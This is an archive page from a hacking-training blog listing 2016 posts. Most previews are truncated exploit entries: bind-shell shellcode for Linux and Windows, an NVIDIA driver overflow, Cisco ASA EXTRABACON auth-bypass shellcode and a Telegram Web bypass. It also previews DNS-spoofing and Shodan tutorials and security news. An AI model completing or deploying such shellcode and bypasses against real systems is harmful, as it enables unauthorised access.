Extreme Hacking Blog | Cyber Suraksha Abhiyan|sadik.shaikh@extremehacking.org

Yearly Archives: 2016

/2016

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

By |November 3rd, 2016|Exploits|
Read More

Linux/x86-64 – Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CripSlick
#include <stdio.h>
#include <string.h>
 

 
//|=========================================================================================
//|=============== CripSlick’s Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]

By |October 31st, 2016|Exploits|
Read More

Linux/x86 – NetCat Bind Shell with Port using C Programming

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C “fork”
#include <stdlib.h> //| needed for C “system”
 
//|=====================================================================================================
//|================================ CripSlick’s Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick’s NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]

By |October 31st, 2016|Exploits|
Read More

Windows/x86 – Password Protected TCP Bind Shell

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Brother Roziul Hasan Khan
/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd  
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b […]

By |October 29th, 2016|Exploits|
Read More

Cisco ASA – Authentication Bypass ‘EXTRABACON’ (Improved Shellcode)

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: RiskSense
Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes);

 Description:
            This is not the same shellcode as the Equation Group version,
            but accomplishes the same task of disabling the auth functions
            […]

By |October 29th, 2016|Exploits|
Read More

Telegram Web 0.5.5 Username Bypass Vulnerability – Easy Mode

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Malware4u
#########################################################################
# Exploit Title: Telegram Web Empty Username Bypass
# version : Telegram Web 0.5.5
# Tested on: Windows 10
##########################################################################
Description:
Telegram filters null bytes for username input but you can bypass this
filter with “NOP”s (0x90) on web version of Telegram because this
filter isn’t from server’s codes side
##########################################################################
Step 1:
First […]

By |October 29th, 2016|Exploits|
Read More

DNS Spoofing – Advanced LAN Hacking Technique

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

This tutorial is meant to be purely educational. By reading this tutorial, you agree that you will not replicate the steps I have listed below on ANY Wi-Fi but your own; and you will not use these techniques to manipulate the web requests of anyone […]

By |October 22nd, 2016|Papers|
Read More

Shodan A Search Engine For Hackers

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Shodan: A Search Engine For Hackers
It’s true that we are increasingly connected day by day, this may be due to the Internet of Things (IoT).  Internet of Things (IoT) consists of a complex network of systems and physical devices that allow devices to communicate and […]

By |October 8th, 2016|Papers|
Read More

Beware of fraudulent sites and fake offers misusing Flipkart’s name

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Flipkart

During The Big Billion Days, stay clear of unauthorized websites and messages claiming to offer you unbelievable deals and discounts. Here’s a tip sheet for safe shopping

Have you recently received an email, SMS or Whatsapp message from a website claiming to advertise unbelievable discounts […]

By |September 30th, 2016|Big Billion Days|
Read More

German Military Hacked Afghan Mobile Operator to Discover Hostage’s Whereabouts

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

A special cyber unit of the Bundeswehr (German Armed Forces) carried out Germany’s first ever offensive cyber-operation by hacking into the network of an Afghani mobile operator to track the location of a group of kidnappers that had taken hostage a young German woman.

The woman, […]

By |September 25th, 2016|Exploits|
Read More

Our Belief…

"One machine can do the work of fifty ordinary men. No machine can do the work of one extraordinary man."
Copyright 2015 Extreme Hacking | All Rights Reserved | Cyber Suraksha Abhiyan | Site Protected by Sadik Shaikh |